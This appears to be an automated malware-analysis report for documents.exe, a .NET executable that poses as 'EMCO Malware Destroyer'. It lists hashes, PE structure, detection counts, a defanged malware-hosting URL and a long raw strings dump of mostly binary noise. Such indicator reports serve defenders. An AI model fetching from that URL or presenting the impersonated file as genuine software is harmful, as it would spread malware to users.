File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 217.50 KB (222720 bytes) |
Compile time: | 2017-08-28 16:13:41 |
MD5: | 3df3dbadd76ff60df853b632d164a7b6 |
SHA1: | f68c88259de07926ecf5a17fc070803f33663525 |
SHA256: | fd616bf7430ee542086357867883ac8694ad389989ca710b162d5ac3a69dc30a |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-08-31 05:36:04 |
Last submission: | 2018-08-31 05:36:04 |
Filename detected: |
- documents.exe (1) |
URL file hosting |
---|
hXXp://sstvalve.com/administrator/documents.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-08-21 23:49:54 | [52/68] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x323a4 | 205824 | 5d13c452809de3720d4b18ef4b4d7b2c | af37668c137e9858930a2dd3a06fac3f582d7bb5 |
.rsrc | 0x36000 | 0x3d4a | 15872 | b305c4fcc522165cdf32f79ffff73510 | f425596a1249761995357741cb663a01cd851c66 |
.reloc | 0x3a000 | 0xc | 512 | 71a6aa2c8551fa9f615db9282c80a5ee | 7c622270bca387a685cb56abdeffeb442b786d1b |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_ICON | 0x37208 | 9640 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_GROUP_ICON | 0x397b0 | 34 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_VERSION | 0x397d4 | 908 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_MANIFEST | 0x39b60 | 490 | LANG_NEUTRAL | SUBLANG_NEUTRAL |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | Emco Software |
Assembly Version: | 7.9.16.1045 |
InternalName: | MalwareDestroyer.exe |
FileVersion: | 7.9.16.1045 |
CompanyName: | Emco Software |
LegalTrademarks: | Emco Software |
ProductName: | MalwareDestroyer |
ProductVersion: | 7.9.16.1045 |
FileDescription: | EMCO Malware Destroyer |
Translation: | 0x0000 0x04b0 |
OriginalFilename: | MalwareDestroyer.exe |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
No URL found |
LegalTrademarks
VarFileInfo
466da973
000004B0
7.9.16.1045
ProductName
InternalName
>.f,>*
a9b5750021
a9b5750020
a9b5750023
a9b5750022
a9b5750025
a9b5750024
a9b5750027
a9b5750026
StringFileInfo
Translation
MalwareDestroyer
Assembly Version
FileVersion
VS_VERSION_INFO
ProductVersion
FileDescription
Emco Software
EMCO Malware Destroyer
OriginalFilename
LegalCopyright
MalwareDestroyer.exe
a9b5750018
a9b5750019
CompanyName
a9b5750014
a9b5750015
a9b5750016
a9b5750017
a9b5750010
a9b5750011
a9b5750012
a9b5750013
a9b575008
a9b575009
a9b575002
a9b575003
a9b575000
a9b575001
a9b575006
a9b575007
a9b575004
a9b575005
s{B)
>0lX
~amI]
/m>jj{6
K`'
QnDm
C]%[&Q
w/rV
|2a
>\K6
Z3kK
YgJr
QWO7
PNG
5%is
{HG6{
"{8o
>b3ZC
~^8T
&<0'
rc#_j
$ujuh
Sy@7
" YD
G||
N>EkD
_Ap*
:yNl@&#
*Y+
nCY7`
Cr.x
,X)6N
2NE
@&+3b
isGL
#|>Qk
,<5
nCb
gJo;
W4 jK_n467+
$s'G
\V)*B
.rc).
oE#I
60C#I$
Nx
hWcK
w]mL
Q8TQ
bj\*|
]ha
SS^0
up4z
%y50
b^|A%+
{mV_
CryptoStream
'AOf
&Pl?
:WLca
Kcw|
G/g o~
j>b~S`
muw
Gga"
M8W$0X
5' d
&=z
`r!
hm<i+
'Ve"SJ
g g[
?v|D
M `G
C=Y|@
.cctor
*$hV
y&h_w
f&"HU
NiF`bL)
lSx[
d9n Oox
yE &d
S:^t
p8p*
|*mX
RuntimeFieldHandle
[Ax6D
`rMy
]kD]p
CwPn
8$VE
Q?I@ _
p9v|
-Wy>
Ue34
mscorlib
;Vjg
cze9s>MV
)qKM
"_02[
iUI5
+:#
Buq@
4y+u
!}*+
g|2=
5_hx
Kn'\
9 ;E
pr?a6
7B3`<j
T"T=
<OSt
]AU\
rO
E1e?
9L]%}31#
P{0\
+&G}
i8f#|
s Xuq
e]|M
WMg@
y~);0m
8lyX]J6V0
1VE:bP
AssemblyCompanyAttribute
fgZo
={5&
WU z
jjW
`| ZE
kZq'
u_z_
y_Z
nV#d
:_r{
$56c9d21d-4c7a-4b45-b6c0-10df457f6f1b
@ "S
Pj7
u` >
%:lU
z/r4KP
P m`
g`8
Qt,\
E%U/{
^4$A7}
)ePa
mg uR
T^Br`
Suu3
'up\
:D:EN`Sn
Gy?W
R>XU
Y}oq
5I.qMe
=Eo+S
}/[$
get_CurrentDomain
q2[I
#S1;
System.Security.Cryptography
5U0k
+&T[
"1 6
V0mZi
48_3
e[tsIQ
]@, '
=4x@O
|!e}
@/ O
uTqmn
x^|4
4_\<v
BD]
z5\f
#AxH
M+r
A7Q,
$rCwm
[nu+c
AssemblyTrademarkAttribute
tL/=
&e @
Z]Bf
u\9:
+~rF
.Eat6k3w
7LKl
mNf$E
set_Text
Fek}|
QCIs
``1W
TAULa_
rO
"eD.
V]4,
)oVaN
:]au$Ml
}{AnT}L~
P[yr
#Blob
Control
Ww,K
k:HP4e
SsIn
t_LM['
,q,*
&] G
t,\Y
CK=O
My3 -
d/Q
r`9
od)s
5Q3 K
O^JJ*{
,4,;
]FJdd
~ : )
^^t=
7h)& x=bm8
#PtJ-N2
R7UB
Fwpm
![P
#ccqS$
'p h
Uu?J
'U71
j[p+
~1+/
Enf}
uAu.e
@|*xHy
HN8(
(0U
X]Oib
|!jxU
'2z
5EUE
R3_%
^Vva
wGY
m^sy
X/_`
0.C^D
IAu]<w:cg:
J!DK
D%VKFE
`]SO
_S"v
x<$`
Char
v*N7
}'B!
)!5A
]8mS
Ifs3
AppDomain
kb+
R,ZkuV
1D],h
f[C.
(0:$
od Upyk
v$bF#S[
}'1J
az4i
Io\
b\r .1 d
4(qK}
.vJ#
i:.$X
-hCW-
Q+v l
3^)Y
I0$l
d49J
8F"
}0$$
lm%j
P6)<
7?<*
1k)M
O|ON
;aH{C
CdDa~
IDATXG
$=Y1
7 ~Y
23Iy
p]D}
qE74V
27y99
'X]*'x
+EuG
Noj
K:n
9-@B
OCoV
Gk7#
u'zp
pf;3d9;
bB$/h
JI '
xi"
'zJf
.text
j$Be
]D#+
Emco Software
25hL uV
f0 J
wLl8
^=3~
>Ob GD
#rB=
^ eIS
m7FqS/V
QG&""N@z
AV|@
t`/E
mCs+
AyZK
q(dKL
Ld{b
iShl
ngbF$
@FyLm
5<
uJF
)>YzY
{Ot
p]`<
njN}
b*}0@
*7K?]
fIBd
)*lJ=
d$|[T8`/
rlXs~
UO-<
I,o
eJ*^
\={X
" qAG=}0
\b!^mc]
7($,C
fWua
u%x^9m
<p
ZWIf
qOhI
Q#)2
_YJF
S;RG
#K^-N
";~z
LXXs&
&7UE
9eEs*
UdUR
>mJrF
o AS%H
K=Ce
h2U@
YE*c
I8KK
`.rsrc
RSjyi9
2Znr
b%cO!
1rQ)
g,yl
P`&3
}wGA [
!V%i{
j&G u
kQc?Q
#G<n
#Y ]
[U-,
Ex3
6{N`y8d
*"dN
4gSM
8_b
[ YE
+4py
wU_c'C
*j#>
SWaw
;{D]g(
ggw1
U/1Q5x
izC@
=2_5
M'|2
9 p>
!/Z8
w%7)
:C~8u58
<_L0M
*l| ,
u@UJ
np f
Ir{K
l9O
anf'
|qi \
xv/=
t* %
2`M)A
u{+=
sl+i
wWc)
D}E3
,8"|@
:_j[T
W9Pk
?tmjY
WjA&
j.";
k?,M
Kwzga5x
=z:^
eO AA
_6*nY
fwu~
>CG^S
=.t`
t5>Z
'},T=
v_F%FCi
Qb.V#
+*{US
cs*"o
A}XqpeE?
+7wP
DK@T
W#`%
{U2o
*<we
qN*"8}
XNR;
~l7nV
+{]ds
/ZtR
V3s+
*F:<
"+l}
`&?yl2N
:,B0+
. ++W
ty5
FE ?T
$rgYi
5s'[rm-
C <
UkJU
"EOIC
.R#<
Iegx
JK(E
J+''d
~mzP@
Write
%d^(
b^%6
}lqr
swIZ
Xxw~PQ
qWAy
U@%Q
\cb4
LR_u
~Ype
\PDVD
/Elw
{p']
g9ar
ep_~
}3V=b
R6: KL
QvdE
*IM=
u.xd
mscoree.dll
XlrW
mw}
1q}^
*X&||
a{4*
>M [
Z Sq\
:d+E
xD#S
ZEVv_
EnableVisualStyles
;rN9
u5c {
System.IO
(g.pU
WrapNonExceptionThrows
V}TH)
b~qd_
{R3s
y}Gq
14~bx4
6QN<
e4.:
2Wk8
aKZj
i.r*{BN
3N^[
QAWH
TC7U|
kvO
}&oN
t"$fS
X[L?
`^?
}\&.>
AweB
vEeD
cu',
ks0ml
t?*;
vx }a
L')=i
QXAx
Eu'!
mzlj
dA?l
+o+/e
H-W~w*!
U$8u
+@~?
IHDR
Prz}
gh\}
4kz4eAjZBY
aW*{
plbD%
lSHsvzf
rPJd
,` N
;kYq
z\a(x
//hIxN
4Fy8
Tx+9
M)y4
System
_n 3
Application
GG2:
`$w?
-+ail^3
Q hO
PgLZ
\ M
Qkc
Af7-9c
QBt[
=Se,R
JMJr
bXXyP
hV<NVB
kp}x
ihgD@
$C4,'& d
k%z
`vOb
Y/M#
wi7{
}RB
|R<%
Dbs
&d>T
e?c!
MethodBase
#Strings
~-"
pA0e
/b}U7D
$Er`[
d>o=
-j3!
pIgg,
\v9G
#;FR
c#7w
b1LH
uT/^T
80%
XNY
q_R@7
D>Z5
*("}
x.}R
rdM}_K
{f1tb
%p+tz9P
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
W29h
rs7c
[^9K
7P0
x<&2
]%yp
d5)A
.4V|
~'%o
8d)+-h`
gYoJe
wUls
GNii
hK |
4S'
Pab'2
aoR(
Mu_U
T<a|z`
T uW
C;N[
E2*yW
PTzej
I1w{8
[9`l
gIZ+
Z5L9
%c~"
kF[R
c7/?N
%ndwq
\zVC
W-e$#
IHVu
#q G
Z=vM
.iAz
loQ`r
D>ex-
[$x3
+Zm%'
+kw=*
/B)[
sDEVGe
B}be
>CWj
CP5
qZw2y
_/rw
_ts8Z
+#C^s
FvI
PFpZ
jb^s
-3$+
Q ha
3]B_
sl 2 a
-&j./
kGv%4|
1P?5y
#fg@
<SE(
RM[G
8JWf,SWS
JZb
U6!a/
Y<)j
Ru:*
[~lu
nLAn
],}3<nP
-PV`
r;\6
QI50
|AZ
n/qU
xaI[
YH.OA
Q%UoW
;v %
_CorExeMain
!iid
N]LO
u4Z4dkp*b
Re^
<dYQ?T
)|^>
#8}R
>V9jc
Kj=*S
Z4z2`*
%?[4
;y^e
w(Hl
p>8n
z3TR)
]EM
dYUG2. X
6?=+~
QSystem.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
oEw2`+
[BJ
V3;q
+f hV
;=^z
@lU"'
:hMK
.CD$@il
IxE"#
(xO'M
S&m
}*R
%=TG
p_>s
? )$8
O;Ds
yDO%
.$!-
RuntimeCompatibilityAttribute
%zCz^g
;m%
o2.N
vjfj
)]T8
D?< +
VQnB
*PEhY!+
#UnZcFW
"k21
*l^+
obY?.hH.`s
t^n2
*O~L
*$obnQ
ZG>?MK`
c5n~
EU `
y;}:
_/ T
kk3;~
cjGt)C
=;KT
$eF
7%|/
k=b"
Form
e 0j
R+N!
8ioT}
>Nc 8u+3
_`_J
%c!<
&T=,}
KoG~
0z]
{=.oU
f6PU
jgP\
pdtq
7X*6
t ?=Z
qs=K
iS* b
u4CM
EMCO Malware Destroyer
H>Om
],
[uf{
-&g)C0
(wrm
GF!9
`:`p
c@[t
";Xe
xP5N@
4v"@
F>z,
4w4M
#GUID
]}P!
MemoryStream
H1G.
`*@9
EH>o
^{
OQaw-
6i2;w
|M}s
F9 "
1_F)
VcW-qI"@
T>g+Z
A[OY
643^
[;mc(:
63OVs
AfgKYw
F _P
MGR )
oYdQ
=3I
)1kA
<Q<f
Byte
Yd{f$
![!|
V ^8
hhr@1
x<'%
"{$,
`nDy
FE;G
. 6Z
5-/n
2y`
CryptoStreamMode
!H(/
_7ZH8
c`2u=
aK6z
].Uk
4QT
PmA a.
;68Z
t&B
&I4c 6
vL*y
ZLWR
,}%
ValueType
QdXQ|
nEp=
#i*'
GuidAttribute
O=u
Ox!j
:]?C
}h;Ja
Lp~|
oe)7
Z{EI
cw(9
E7WUC8
(s>Alg
<s94[m
TF:u
qe^Oi$e%
`v{DWp
-#v.
)6A,
3Kqk
-C!^QV
S4#+
(X@g4
IEU@
yDR2
l|[r
vTIu
.\$"
.S:m
jd)lM~8AT
C#W
IEquatable`1
ToArray
Qmss
sw"2
x{"
Qnz'4
6g$Q
[6n,j
D&R^
;ZC"
k>/XP-
r?K2
`44,
^DpRr
{gHn
|r~o^@di/
+ V*
's\k:
GR`%
>4=$5F
cdX:
U{.#i;W
LDbN
6
AEB
_Aq8
J 0N
{f TC
|1+
uHCL
mBQC-&d
m!5+_
0F^$(%DG
aGL j
3*k?
d^K}
JE ?
\uy
A}Q7
;^L.
# }f
XFd0=
V%K|AH
R(UQ
!)tJ
MIaP
`bIuO
#Hw U
k*}Jw
q3
ARif
Kxb2
lXJK
;zU\
jzJ
e]Dn
rIy6
hQul /
RCpj
}ee[
8P3=hKBf5%
ICryptoTransform
r/Z+
Me`
20R&
|vV&C
ZiE\
~yuy
b&Up
AssemblyTitleAttribute
hNk
"f`q
6bPn
nrd;
\5DlP
e]vF
T6!*e
5kp.
aw
!'}Sv&4X
iSk3 D
*+~{
b 0e
ALaM
[ Y2
,3jy
jXxK
#nGe
02kz
Kqz5
- Is`
d.q=%(
J%idm
Hg |
>w8+
kI-=P
S+Xx
=z|!6C
Data
9!Xg[
KoJ&
k*MrB
4g7P
{!55,
]2 ~
bEP
OJ}~
aeCd
+]'VC 2.
_abX
hSystem.Drawing.Bitmap, System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPADI
get_EntryPoint
gYq~
};[U#|
]WOE
pHYs
t1D|
e)t7oR
as7o
dU1%s
Zmt(l4bP
0(b$
[\YQ5@7
Container
9uP|iq5h{
_t+>
o/p=+
r7s!
tj`
zHCN
v]>(=
Z2tX
Y t>
Q}.
{ Zg
Invoke
v3(2
HeU
vRo 9
JvE\
8Wdl
Al*FL'
oht"
ij]6
=UVbj
q6m}
ud
'I_
|/>62mM
w;CJ
s C}8e/M
S wN
y%Bp
<Z ^
PWl7
%'}R
D6S$
VgP#
4e,bhD
^ 't
e] K
Z?Nn
X5nO3J
W^da
`pkh
_:u{
Y_2.
]%u,
p6#jF[Aj^
P@dR
Ywze
Yr| -
%C0U
@.reloc
vomB
1FHu
&%s3
NV;xb
sJ\p
QTFC
'8#
0m 3
c;;L0
TQi9
cY +
5)=c
Er/
[*?9>
.4Z`
DwE^
R0.:
CD/RV
6Jk
OgRVKE
xQ?w
X<F[$w
K{@3
D*7s
U{f[B
5 D\
g4b
=*VH?G;9
l~NS
JvY$
.ctor
pBD{W8
s= y
%FW|u
;iHo
L7 #u
9 |q
8P3
BkxZ
geE>
9ab&
-8}W.
`.'S
h&_y
{fi3
RLimh2
[_R[
zE(C
$vF"
D?KM
5RG!93T
a_/{~
A| &
:uppt
& >~
ZPVtg
D3M[
4nt7
G4J)
D :k
@Z\k
lfe
w!\XFW^
4~?o
%d>}
a<o>1
=#LF5
WX 4
4FV8!}Pj
(:A<
=(Iv)
`g#U
j(LUM
FUNo
s1|s
~ae$
)}fe
ZXEo
}{;dv
JK,k
4341
?<)}
NUJi
MJ
KC)x
aQ=pD
Oh:M
0l]"
KFLq
npeI"
pF>_W
Assembly
7CtA
1'-
VzYx
`(`;g,
{E?\
FWJ^D
Z'tw
> hV438
NC4xw"
8: xu
9ls1
=G\+
&}}x
0M%L,q
)<H@
|? *=d
nhJd
^g&+
N}
7 X
44f3
ObGT
Yv+-
'xd;3`[
)NS^
sd:-,
[yx}
B{?&
#0Jz
2wNW3
zoy
a@9X
(UCFW
_XUE
j[WVl
set_AutoScaleMode
8jY.I
RD
wS7}Jf
CJq,_c
-c@ moXr1
}IDATXG
xj8O
qddOI
&+tP
A.
$yK)
W,ay
c>r
Yp#J
_{~'74D9
;+{'
h.Cy
Im2K
|hV^N
F=^{
IContainer
y>Gg
0P.1x
*g)/
dvD
CXQYn
=c`
dRs>
PXd3
tYZ.
V4_Fz
MF?~
Q|'i
>p|6w%
eZ*l
!M^@
@dAU*)
kSE
[FJW
; yH
1'{s;M!
wN>o6
fT'2)
?J2O
@b T
*`d%
W.I\
?L:b
]`x7
zv"am0
H8U<
1s+>1?C4
p 8%
w/y5u
nOamA
bn}{J
%eepr
U#~L
k!cz
[mZv
n$.^,\,
StringBuilder
ozr~
u+$l
X 3
8;
*<t+
ZZNJ
avKB
zW7L
4vM@
ZW$5r
%|@K
Vf&}
s9`-(
*o$*
.,JB
_>R
UB O
lBAO
\X?!
#_$#
bUZz
Nd_a
jgvh:g
>{5Y
.=)`
2YoC
ContainerControl
)Wbz
c,)y
% 1na
<X`z
6@|gi+1i
)9u
sR_g
R</
w@Gc
;/+w
*}W`
t58+
WB\t
`sexm
lG{'
JVbI#4kd
MCNA
:Qu$M
Si5
mX9c
n*fx
F Z ,U=
/]b&
3r99
_liG)
L]ew
h mI
~
YO[Id$
c$)K
rJ;f
APB?#.
PaAA
tAJ8q
&#zd
hjg1i
](][
=I/z
-$n
jX7N
vYdtb
L&m
,rJf
NH0'
M:Qu
R_XI
q AX
.D$G
z6W
zpzK
;6
jBG`t,
~-.?
q2;z<E
HwG$
m{w-
yo0,yV
RuntimeHelpers
k{&6n
#%@.O
@4)K
WIOT
:#{fl
"Y,w7
I~R%
@Ch
/\ 4
2v!%
"zA}8
_D FuO/
6zf_
8%,M
;OQM8{
R;OV
O`K~G
Y 8J
qW~@u
uM41
`Cf(~
qf[>
}4/A
Close
1giHOM b
O2&J
0-3
VO=+
`>ST
>n&X
TkWn_
;wEW
-17,
10pyI
!'n>
f0VTI
1ERK[
FXa'
EE2h
Y|}f
saFDC
gP4:
y_P<xhZ
qP~5*
\wZ`
a8$5 K
|i9.
&9o
ryF)
(fbG
\ai`d?C
b:$4|
%n!5
9Y3r
GEx@
}_7ii
l_B
uHv2
rpk}
:Az
gAMA
3 ~f
.5J
LPA3F#
:&B03g2
{5T=_
[__YQ
-:n
A!(O
AutoScaleMode
5\4B$Z
O#T 0
D6Qh
W& ??lw7
IWmz
I $f
IgviT
!*+y
\S@zJTg
M7y
HM '
~?-\
$~3X5
z j*
Wz%m
)iV+
rEOu
|]9V
(/l0
JnWqu
~&'g
C8.fU
>MhJ
rF6}
_|3{|<
=0ZZ
UOS8
->q|
/}{2
vr<#
M^E/l
~'?5
\swxt
(uJcM
V0(/
z;SS
_t>/?
2K\x
]5(1
9j^3
System.Reflection
YFk
q.X
0H;n
!33^7
hq9K
;AwO
(_&=
GcF*
EPOy
2})6)-L
Qgh!]
v~adF}L5j'v
)BTm
Lfm|
n7U{
[Cm&1}>{p
['?
n2=[
134Mr
K5Qd
?[ Zh
2R?,
G %G
8lxv
5Vc\
yJ#4+
)-C8G
>%e&hw
_>i|
PUX`_
Append
w f
T*"arY
,J&d
dD<&K^
H`Ow(Xy
8m^fwr
VaHQ_
kS)V
lC;^
XgOZ
<q1$
.Z"X
mg-A
5M+7
3kQzC^
Um^
y-(Wm;I
D 8
Nbtw
?s'Y
Ob(KV
#`8NBV
x@xF
F!j^
fz5-=
9@z2
2~ -7
&bw_
A k
QfeRG
9N)O
?hRy
ht!s~
ay5Q
cv4d0
7I7D{
[u-gD
,>aG
y%j+
"nST
jgLUw
+Hc_
MhZV
p}G nU
|'I
!9[?;
\U~7
CA%`E
MzBr
Su|G
ZG]A
m4BAl
IG=55
yH[
dG/=m
$keg1#RQC
r%ar
8Ch`
ye D
] --
=UE|
1WU&;
H$!*Yqp
9?>58
j]?F
Nqk)
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
f J=
A7H.
@3ip
#+;{{
[S!P7
S-Eq
] p>:7
(Y*>
-Zj
C-'c
>(hdJ
`Tm?
W"N,9
!This program cannot be run in DOS mode. $
m[z?
NV#w
e>~[
CKq5
_<R-
6f*5R[P
wCArR@
%98j
W Y#
&mN:
bWJF
2rr6NS
Dispose
oM,3k#%?
/@jN
.Q,"
S"u<
OfK,
;SXk2
tmE
2}n_Q
o;1L
'R7e
W^iC
wYv5d
/Dk.
O>I)
QkD9l
~r(+
M$i
LBtq
N =W
C<:5O
ai^ef
o_ fy
5<=)
;c'}7D
?8B}\
e38\
Rj;V
>g|
<rXr
J>Xq}
yg1=n
~>CT
y!OM
.^]T
bn M
C:jHo+
y9<f
4@0EC
w+kTD
vIP|
rv2Al
F/<X>4
R \
<bv
m (8
P.Jf
DvJ?
BSJB
_4?R
ctHzK2
0n*j
d [s
N'Up
:dx^
RN3<
zbm2
B)m3M
F.B8
-A1l=
Dsf4wn
x<-
/]=^
FiK
S(Ou
gzu
R>F
ni17\/
'uo
i_!m
+S`I
ntB})
J"+
S.Q"
hM{u
Lil
X4lhF
b><<
EqW
1INb
eXec
4}/
K>up/
+sDr`
DvJ^
: :*
8'cT
zg4o\
QpQ
3Ll&&
il>
ADSR
zh-s
GyKw@
@ c~
?l?w
ifgL
G&3?
D5n j
MHgu<3
fY]a1
~OD:
STAThreadAttribute
vz'n]
q qo
? H6
qYq3f4
@I)M.
fjGiC
|c.R
q$g 3
O9-2
]Lx/?
+K>
`sA{
{R6@_
EsvL
-hv$
ioAd
35B
Wm*+
)I/r
mQTY
u~!{b
DPe<
Y&('
pE&?
G5Q]\
|UujA
KO=/e
gr<z
##}g
q F6
68GE
G<CyS
to3
#?s|
!)!d
g|$q
yEjW
Zt0(
otUD
u\B~c
8w@-
0W"gZR
m9%
3[ _Q
*[ -
$9w]
set_Key
[<#$
~2qr
]_#%
tre,w
P+pr
*Po<
/7yI9
~W=3
VS(H
y=22
=nYQW
V%luW
Rr4A
?- Lc*
Mp+[
6r[5
C5qk{Xa
%`p$
9 cJ
bN <x
4gn[
iJ)&^
`} %
Sdh]M4
MethodInfo
(X&J
n! 9xt
#q ^T
@^{M{um *
QgKK
gO#d
le0Q
lfY/2oC
CompilationRelaxationsAttribute
?cSp
B_uJ
bY8=
1yb(gZ,x
*]}l9W
z%@"
4yM(
\ZuT
$?X_
'^ w r
7"/y
_Z$Pc6G
=s*C
hv~d
5JSCN
w#(u
HN~
GaV!
~ ph[
|}Z.
g)o'
~.<y
J'8z&1@
WQOCWIu
(?Kh
QwW}_ 6
{|bgh
?e@-&
xg<j}dS
(]l^G
7 A
Wjl-
{<H
X ]P
*Vmk
^v3%jP^
S)Z#
Z H
PiNcz&
#$h^@
/ ~Q-k#
&`9,O:/
l{DZ
=H2`
^5Qh
O4)!)
S-lN
hZVEA
IEND
+ RZ
]K+z
5*@
B|:.{
8D#&u
n>#r
JMR
m#u_
$HfH
q?;*
nfbo
tYm+c
z[&O
t<d*
Yrmu
"h(g
t:'uh
U+0I
Ex}`
j]`"
zt\J
IBK~
[28L
,Oi!
w-`KTt< 7
Sm??.
aJ.i
]alX
emx&
+XF
8-2f(
i06s|}
_Z<
,mpA
-~[%
zetS
,64K
x~
ZdO~
kvG:Yby
xb/e
-Fo3p'
!(?)
:fn4s
Cl*K
_lii
f]w4vb
rq>=]
{NC3
7V{3
rJ1"
zK,`h
C+7z
aDY_lj
CNsi
Y0j4
magqhb
,hy
x3|#N
A :#[?
g =i
z=6s/
y/GS'
3^<gTq
*C\=
?y[=
11b6
ijXs
\rW`
m~>
p>i:
1`"Rw
V!x+
6zX
Yoa@
6?R.
A9|[
hvQb+
Kk #
9Q0a
AssemblyFileVersionAttribute
7 tT~T
o1IV/
4?@2
yeFP
U0U}
[JY`
g3L
~lY^~
reF@
S^#
3Rf
;YC(
G- na
' So
uYn]MG
`bk&
;AV
>)c#x
Rj;|m
+$\#
|UqY7
Nn`A
Q%CE
ql#N Q
6X80Gt
m=2n,
u[1:
$/6HQ
2i|V7
$Nzu%
2_;,
7w<+@
~M*5
=dcT
h% i
:Nlj
ihy:
Cp{\
ZSH~(.
*Mtp
( By
[`S !
y w@UlVB
%vC*.
8;{?&c
%jG
ik)G
Ag0d\
k(i!v
mB](
0AFE
k(x0.l
/L@,
KUwMBmmT&
H 9q
k*0a
E{TG6
3{iT
2M..)/
VVR-"j
Y- BF
p.l4f
jb<2Y
T>b)
S&8Nl
a\ L>
B{I2
5JU
twg 6r
5 Pl
+ag7
XdCM
OY_E?
0zI6c
String
YKn4Y
A+mD^
Or*
?[KB
QPp<
f> 8
+jQ
.5V&J
K69
z3$\
5qm5
ID00'
# -k
S`+
74&
Dll|]
i6_9g
% ,
InitializeArray
P,B
d2
WX Z(
vIn*
Q*P0
In!np
,x.-
ijs>R
$wOm
Z5KR
$zX43+
enviX
U|C3~
FZM;
c&,G
iY3>
YZ>AoV
g<S
uvPK
r I
5JVU]
;Fi
4*yC
-;#
L6\a
$iadx
B~cgw
Az {
C([j%
Xmo-
T_#0
TA/!
Xf` *6
),&5a
1PpY
n2VG}b
/8s|
9Ln_
k@D"%
Hd%1
Z`c;
<ley
b?w6
I;>!,
zy=u
#.rj
Load
76z
w4ZX
O0'|
4iO
2=Ip
^r,?>
_+<Sk
u"M>
uH_5
o[YW
R}vbfw
*%#)U
=apiijATb|s
Euwc)
=rj>`
z+W,p
D ME
$6!U
LoXr
8pC2C
ghx*
kd)Wb
P- Oo\
8f+8
w9 c
?K+n
saaN?
H"&j
`?MN
3{R%
o^O,O
NyKV
Yo~
SHF|
m`7
mZ-
~IDATXG
ZN]C
=L35U3
^g#~+[
`uZN/t
5w]p
n D
SZ?2?%^
NTzo "J
45hVvT
nG}{3%
5+%[?b
F}K{
+D6}
q.IcB,
w:i6i0
;"or
("_O
Qmc7
h/R=
XSAK
=%1gS
FhM7
}%}
Q"pD
bQO
Ca]7#T
kc)
ISerializable
Rk6}
L7En
R:TO
3)63cC
eZrLL
}+K0
bk*
Object
Fy&9h&64
3WZ{
R;c="
$P>/
yIrN
}$$U9
P] a
0>I1
%;p}c
gIu/E
I}Z}
ComVisibleAttribute
lH:h
^jF
;\3:
vjS:[
c>(`
^_8j=
^ r
:ly
w`
>'G'
.aYd"
7.9.16.1045
Juj#
G?WS
\'r4
_"d<
/>${U
#ZJJ
E&~q
9.!S3
IpL)Q
A@O)
y' A
dhlg
U9F~
G2uC
2XiC
Y-ciA
#z2[ "
(w"i[
RRFf^
(1Ww
aw?Y
X^vB
2Vbr;
/* 8O
^vi3
m*[w
v!lw
Z0f:
gzZL
p`B
BLTb
D.5+J
~w9
)gX]
Jagt
yDM e
XPk&a.
wSDJOIA]
K!6?hi
D|JY
[Ork
VTQV_
Rh?&Q
|Kdo
bE7OY
j3%|O
4m+I
Stream
`j{~@N
y a68ua6
N:gn
*D:`b
U;; s
8E(Z,7_
B9;k
AZd7
':bSE8
t~Vs!
$",P
?C4'
vdXQ
: *Z
zr7}
RT`<
wKONb
],
eyjp;
$(&[M
]]n|
Rijndael
`eck
pf^:]
V(@
Ii :K9
%4SS.R\
"K8X P
'Kx;6?
rX:
c(59
-jVp!t
d)[t2h
<I^h
@qsN8 N
k1hU
4pYL
B6Y?
I ZU
o1)+X
e%V U
k_G (Id
eO=}>N?
&M\K
%Ey|
PAVSl
}&{l
,X1]
.w9bY]
_4~t
,Y+
HF u
Ntza
bBu@
2'm+
c'yu;
u#Grk
XcoQ
CQ]s
(%!/*B
_RKTS
9(&y
:B{4n+
hrZxbO+
ka<O
\^8w
QTFC.exe
G!<}8
:vv2
w)$J
9Z"Z
Ypucy
"X*m
/x&\+
7@Eg
!+(J
6wa;
xq'
\Z0b
p^s;fM
t"d
6_u0
b?&0
)lZ3x
v1uljDI
1FB
mM @
t0{}
kW%B%
(5L
4D:V
i03~xr
+tRv
ge(Z
<qN:v
G@ =
!eS
~U3
mSwz
.&=O
\R6
|NOB
MdC}
qM]9
({<7
6x"E
F[4c$b
oUi'
a/WjPP
SetCompatibleTextRenderingDefault
XjKC
LU$I
.= 51'
^ Flz*q
TCTt
X? Y
o|A&
Ng"\
]1
(3PJ
a`>0
l} i
Q/99
set_IV
2MV&
Zy+JZ
Ex18
d #Nf
b)[Af
9`:,?
Rv9a
q\H
ZY0
;BEO
tF[j[
$o.
k)uK
Fw3y
Ls7?
|YNm
]iy~
`Bfe
r*1=
WBU3
kbY,
,7bK/|
EY2*
@XU(J
}$h?
:q.-n
,CYw
sBxp
FdpIT
eo77
p#`v
gm3"&
LJs@'*
>-)b
26't
